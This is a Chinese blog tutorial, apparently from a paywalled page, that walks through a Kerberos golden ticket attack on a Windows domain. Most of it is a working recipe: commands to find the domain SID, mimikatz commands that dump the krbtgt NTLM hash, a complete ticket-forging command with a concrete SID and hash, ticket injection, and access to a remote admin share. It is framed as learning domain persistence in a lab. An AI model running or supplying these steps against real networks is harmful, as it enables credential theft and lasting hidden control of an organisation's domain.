黄金票据
条件:
1、已经拿下域管理员,获取到krbtgt hash;域控SID值-500
2、利用krbtgt的hash制作黄金票据工具,进行攻击。
流程:
1、域名:god.org(ipconfig -all #获取域名)
2、域的SID值:S-1-5-21-1218902331-2157346161-1782232778
获取SID命令:
>whoami /user
>whoami /all
>wmic useraccount get name,sid #获取SID(选500结尾的)

获取krbtgt的HASH
>mimikatz privilege::debug
>mimikatz lsadump::lsa /patch #获取krbtgt的ntlmhash

4、伪造用户名:webadmin(任意用户名)
god.org(当前域名)
webadmin(当前用户)
生成票据:
mimikatz kerberos::golden /user:webadmin /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /krbtgt:b097d7ed97495408e1537f706c357fc5 /ticket:gf

导入内存:
mimikatz kerberos::ptt gf

访问测试:
dir \\owa2010cn-god\c$

黄金票据总结:
该攻击⽅式其实是⼀种后⻔的形式,属于第⼆
本文详细介绍了如何利用黄金和白银票据进行域内权限维持,包括获取krbtgt和DC的哈希,伪造用户票据,并通过Skeleton Key、SSP、DSRM和SID历史记录来实现权限持久化。这些技术涉及网络攻击和防御,对理解域安全至关重要。
最低0.47元/天 解锁文章

993

被折叠的 条评论
为什么被折叠?



